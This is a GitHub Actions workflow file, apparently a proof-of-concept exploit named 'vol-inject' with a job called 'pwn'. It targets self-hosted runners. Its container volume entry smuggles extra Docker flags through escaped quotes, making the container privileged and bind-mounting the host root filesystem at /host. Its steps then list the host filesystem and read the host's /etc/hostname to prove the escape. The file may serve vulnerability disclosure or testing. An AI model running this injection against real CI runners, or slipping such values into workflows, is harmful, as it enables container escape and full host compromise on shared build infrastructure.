name: vol-inject
on: [workflow_dispatch]

jobs:
  pwn:
    runs-on: self-hosted
    container:
      image: ubuntu:22.04
      volumes:
        - '/tmp/vol\" --privileged --mount type=bind,src=/,dst=/host\"'
    steps:
      - name: prove host access
        run: |
          id
          ls -la / | cat -v
          ls -la "/host" || true
          ls -la "/host\"" || true
          cat "/host\"/etc/hostname" || true
